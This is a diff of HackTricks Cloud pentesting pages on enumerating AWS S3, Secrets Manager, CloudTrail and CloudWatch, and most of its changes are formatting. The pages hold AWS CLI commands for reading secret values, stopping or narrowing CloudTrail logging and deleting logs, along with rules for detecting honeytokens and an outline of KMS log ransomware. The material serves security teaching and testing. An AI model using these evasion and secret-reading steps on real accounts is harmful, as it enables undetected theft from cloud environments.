@@ -1,19 +1,6 @@ # AWS - S3, Athena & Glacier Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 @@ -47,16 +34,15 @@ A presigned URL can be **created from the cli using credentials of a principal w aws s3 presign --region 's3:///' ``` -{% hint style="info" %} -The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` -{% endhint %} +> [!NOTE] +> The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` It's also possible to create presigned URLs with **other permissions**: ```python import boto3 url = boto3.client('s3').generate_presigned_url( - ClientMethod='put_object', + ClientMethod='put_object', Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, ExpiresIn=3600 ) 
@@ -72,12 +58,12 @@ url = boto3.client('s3').generate_presigned_url( This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. -* Encryption: - * Object Data + created plaintext DEK --> Encrypted data (stored inside S3) - * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory -* Decryption: - * Encrypted DEK + S3 Master Key --> Plaintext DEK - * Plaintext DEK + Encrypted data --> Object Data +- Encryption: + - Object Data + created plaintext DEK --> Encrypted data (stored inside S3) + - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory +- Decryption: + - Encrypted DEK + S3 Master Key --> Plaintext DEK + - Plaintext DEK + Encrypted data --> Object Data Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. 
@@ -89,14 +75,14 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. -* Encryption: - * S3 request data keys from KMS CMK - * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ - * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key -* Decryption: - * S3 ask to KMS to decrypt the encrypted data key of the object - * KMS decrypt the data key with the CMK and send it back to S3 - * S3 decrypts the object data +- Encryption: + - S3 request data keys from KMS CMK + - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ + - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key +- Decryption: + - S3 ask to KMS to decrypt the encrypted data key of the object + - KMS decrypt the data key with the CMK and send it back to S3 + - S3 decrypts the object data
@@ -106,15 +92,15 @@ This method allows S3 to use the key management service to generate your data en This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. -* Encryption: - * The user sends the object data + Customer key to S3 - * The customer key is used to encrypt the data and the encrypted data is stored - * a salted HMAC value of the customer key is stored also for future key validation - * the customer key is deleted from memory -* Decryption: - * The user send the customer key - * The key is validated against the HMAC value stored - * The customer provided key is then used to decrypt the data +- Encryption: + - The user sends the object data + Customer key to S3 + - The customer key is used to encrypt the data and the encrypted data is stored + - a salted HMAC value of the customer key is stored also for future key validation + - the customer key is deleted from memory +- Decryption: + - The user send the customer key + - The key is validated against the HMAC value stored + - The customer provided key is then used to decrypt the data
@@ -124,15 +110,15 @@ This option gives you the opportunity to provide your own master key that you ma Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. -* Encryption: - * Client request for a data key to KMS - * KMS returns the plaintext DEK and the encrypted DEK with the CMK - * Both keys are sent back - * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -* Decryption: - * The encrypted data with the encrypted DEK is sent to the client - * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - * The client can now decrypt the encrypted data +- Encryption: + - Client request for a data key to KMS + - KMS returns the plaintext DEK and the encrypted DEK with the CMK + - Both keys are sent back + - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) +- Decryption: + - The encrypted data with the encrypted DEK is sent to the client + - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK + - The client can now decrypt the encrypted data 
@@ -142,13 +128,13 @@ Similarly to SSE-KMS, this also uses the key management service to generate your Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. -* Encryption: - * The client generates a DEK and encrypts the plaintext data - * Then, using it's own custom CMK it encrypts the DEK - * submit the encrypted data + encrypted DEK to S3 where it's stored -* Decryption: - * S3 sends the encrypted data and DEK - * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data +- Encryption: + - The client generates a DEK and encrypts the plaintext data + - Then, using it's own custom CMK it encrypts the DEK + - submit the encrypted data + encrypted DEK to S3 where it's stored +- Decryption: + - S3 sends the encrypted data and DEK + - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data 
@@ -255,34 +241,34 @@ You can access an S3 bucket through a dual-stack endpoint by using a virtual hos Dual-stack endpoints use the following syntax: -* `bucketname.s3.dualstack.aws-region.amazonaws.com` -* `s3.dualstack.aws-region.amazonaws.com/bucketname` +- `bucketname.s3.dualstack.aws-region.amazonaws.com` +- `s3.dualstack.aws-region.amazonaws.com/bucketname` ### Privesc In the following page you can check how to **abuse S3 permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-s3-privesc.md" %} -[aws-s3-privesc.md](../aws-privilege-escalation/aws-s3-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-s3-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md" %} -[aws-s3-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +{{#endref}} ### S3 Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-s3-post-exploitation.md" %} -[aws-s3-post-exploitation.md](../aws-post-exploitation/aws-s3-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-s3-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-s3-persistence.md" %} -[aws-s3-persistence.md](../aws-persistence/aws-s3-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-s3-persistence.md +{{#endref}} ## Other S3 vulns 
@@ -328,20 +314,7 @@ aws athena start-query-execution --query-string ## References -* [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) -* [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) +- [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) +- [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
new file mode 100644
index 000000000..282f983cb
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
@@ -0,0 +1,50 @@
+# AWS - Secrets Manager Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## AWS Secrets Manager
+
+AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications.
+
+The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions.
+
+The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies.
+
+For granting access to secrets to a user from a different AWS account, it's necessary to:
+
+1. Authorize the user to access the secret.
+2. Grant permission to the user to decrypt the secret using KMS.
+3. Modify the Key policy to allow the external user to utilize it.
+
+**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
+
+### **Enumeration**
+
+```bash
+aws secretsmanager list-secrets #Get metadata of all secrets
+aws secretsmanager list-secret-version-ids --secret-id # Get versions
+aws secretsmanager describe-secret --secret-id # Get metadata
+aws secretsmanager get-secret-value --secret-id # Get value
+aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version
+aws secretsmanager get-resource-policy --secret-id --secret-id
+```
+
+### Privesc
+
+{{#ref}}
+../aws-privilege-escalation/aws-secrets-manager-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-secrets-manager-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../aws-persistence/aws-secrets-manager-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md similarity index 100% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md similarity index 66% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index 4d1861534..1bfc0a4ef 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -1,19 +1,6 @@ # AWS - CloudTrail Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## **CloudTrail** @@ -21,16 +8,16 @@ AWS CloudTrail **records and monitors activity within your AWS environment**. It Each logged event contains: -* The name of the called API: `eventName` -* The called service: `eventSource` -* The time: `eventTime` -* The IP address: `SourceIPAddress` -* The agent method: `userAgent`. Examples: - * Signing.amazonaws.com - From AWS Management Console - * console.amazonaws.com - Root user of the account - * lambda.amazonaws.com - AWS Lambda -* The request parameters: `requestParameters` -* The response elements: `responseElements` +- The name of the called API: `eventName` +- The called service: `eventSource` +- The time: `eventTime` +- The IP address: `SourceIPAddress` +- The agent method: `userAgent`. Examples: + - Signing.amazonaws.com - From AWS Management Console + - console.amazonaws.com - Root user of the account + - lambda.amazonaws.com - AWS Lambda +- The request parameters: `requestParameters` +- The response elements: `responseElements` Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ CloudTrails logs can be **aggregated across accounts and across regions.**\ 
@@ -41,37 +28,36 @@ Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S The logs are stored in a **S3 bucket with this name format**: -* **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** -* Being the BucketName: **`aws-cloudtrail-logs--`** -* Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** +- **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** +- Being the BucketName: **`aws-cloudtrail-logs--`** +- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** Log File Naming Convention -![](<../../../../.gitbook/assets/image (122).png>) +![](<../../../../images/image (122).png>) Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in: -![](<../../../../.gitbook/assets/image (195).png>) +![](<../../../../images/image (195).png>) ### Aggregate Logs from Multiple Accounts -* Create a Trial in the AWS account where you want the log files to be delivered to -* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 +- Create a Trial in the AWS account where you want the log files to be delivered to +- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access +- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account. 
-{% hint style="danger" %} -Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. -{% endhint %} +> [!CAUTION] +> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. ### Cloudtrail from all org accounts into 1 When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket: -
+
This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect). @@ -79,25 +65,23 @@ This way you can easily configure CloudTrail in all the regions of all the accou You can check that the logs haven't been altered by running -{% code overflow="wrap" %} ```javascript aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] ``` -{% endcode %} ### Logs to CloudWatch **CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: -* CreateLogStream: This allows to create a CloudWatch Logs log streams -* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream +- CreateLogStream: This allows to create a CloudWatch Logs log streams +- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream ### Event History CloudTrail Event History allows you to inspect in a table the logs that have been recorded: -![](<../../../../.gitbook/assets/image (89).png>) +![](<../../../../images/image (89).png>) ### Insights 
@@ -116,11 +100,10 @@ The insights are stored in the same bucket as the CloudTrail logs in: `BucketNam AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns. -{% hint style="success" %} -Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them -{% endhint %} +> [!TIP] +> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them -
+
## Actions @@ -161,7 +144,9 @@ print(response) For more information about CSV Injections check the page: -{% embed url="https://book.hacktricks.xyz/pentesting-web/formula-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/formula-injection +{{#endref}} For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) 
@@ -171,15 +156,15 @@ For more information about this specific technique check [https://rhinosecurityl Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key. -However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. +However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. 
-[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** +[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** -* If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. - * Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. -* If **`SpaceCrab`** appears in the role name in the error message -* **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` -* If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. +- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. + - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. +- If **`SpaceCrab`** appears in the role name in the error message +- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` +- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. #### Get the account ID from the Key ID 
@@ -190,14 +175,14 @@ import base64 import binascii def AWSAccount_from_AWSKeyID(AWSKeyID): - + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix x = base64.b32decode(trimmed_AWSKeyID) #base32 decode y = x[0:6] - + z = int.from_bytes(y, byteorder='big', signed=False) mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) - + e = (z & mask)>>7 return (e) @@ -218,13 +203,12 @@ In the past there were some **AWS services that doesn't send logs to CloudTrail* This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken. -![](<../../../../.gitbook/assets/image (93).png>) +![](<../../../../images/image (93).png>) -{% hint style="danger" %} -Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... - -For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). -{% endhint %} +> [!CAUTION] +> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... +> +> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). ### Accessing Third Infrastructure @@ -234,9 +218,9 @@ Therefore, a user with access to EKS that has discovered the URL of the EKS API More info in: -{% content-ref url="../../aws-post-exploitation/aws-eks-post-exploitation.md" %} -[aws-eks-post-exploitation.md](../../aws-post-exploitation/aws-eks-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-eks-post-exploitation.md +{{#endref}} ### Modifying CloudTrail Config 
@@ -254,15 +238,12 @@ aws cloudtrail stop-logging --name [trail-name] #### Disable multi-region logging -{% code overflow="wrap" %} ```bash aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services ``` -{% endcode %} #### Disable Logging by Event Selectors -{% code overflow="wrap" %} ```bash # Leave only the ReadOnly selector aws cloudtrail put-event-selectors --trail-name --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region @@ -270,7 +251,6 @@ aws cloudtrail put-event-selectors --trail-name --event-selectors ' # Remove all selectors (stop Insights) aws cloudtrail put-event-selectors --trail-name --event-selectors '[]' --region ``` -{% endcode %} In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example). @@ -278,18 +258,16 @@ You can customize the event selector based on your specific requirements. #### Logs deletion via S3 lifecycle policy -{% code overflow="wrap" %} ```bash aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region ``` -{% endcode %} ### Modifying Bucket Configuration -* Delete the S3 bucket -* Change bucket policy to deny any writes from the CloudTrail service -* Add lifecycle policy to S3 bucket to delete objects -* Disable the kms key used to encrypt the CloudTrail logs +- Delete the S3 bucket +- Change bucket policy to deny any writes from the CloudTrail service +- Add lifecycle policy to S3 bucket to delete objects +- Disable the kms key used to encrypt the CloudTrail logs ### Cloudtrail ransomware 
@@ -298,33 +276,20 @@ aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\ This is basically a **S3-KMS ransomware** explained in: -{% content-ref url="../../aws-post-exploitation/aws-s3-post-exploitation.md" %} -[aws-s3-post-exploitation.md](../../aws-post-exploitation/aws-s3-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-s3-post-exploitation.md +{{#endref}} **KMS ransomware** This is an easiest way to perform the previous attack with different permissions requirements: -{% content-ref url="../../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-kms-post-exploitation.md +{{#endref}} ## **References** -* [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) +- [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md similarity index 77% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md index 69b0af807..482a2a1b8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md @@ -1,19 +1,6 @@ # AWS - CloudWatch Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## CloudWatch @@ -23,12 +10,12 @@ It can set **high resolution alarms**, visualize **logs** and **metrics** side b You can monitor for example logs from CloudTrail. Events that are monitored: -* Changes to Security Groups and NACLs -* Starting, Stopping, rebooting and terminating EC2 instances -* Changes to Security Policies within IAM and S3 -* Failed login attempts to the AWS Management Console -* API calls that resulted in failed authorization -* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) +- Changes to Security Groups and NACLs +- Starting, Stopping, rebooting and terminating EC2 instances +- Changes to Security Policies within IAM and S3 +- Failed login attempts to the AWS Management Console +- API calls that resulted in failed authorization +- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) ## Key concepts 
@@ -36,31 +23,31 @@ You can monitor for example logs from CloudTrail. Events that are monitored: A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them. -* **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. +- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics. ### Metrics Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations. -* **Example**: CPUUtilization, NetworkIn, DiskReadOps. +- **Example**: CPUUtilization, NetworkIn, DiskReadOps. ### Dimensions Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes. -* **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. +- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone. ### Statistics Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount. -* **Example**: Calculating the average CPU utilization over a period of one hour. +- **Example**: Calculating the average CPU utilization over a period of one hour. ### Units Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count. -* **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. +- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes. ## CloudWatch Features 
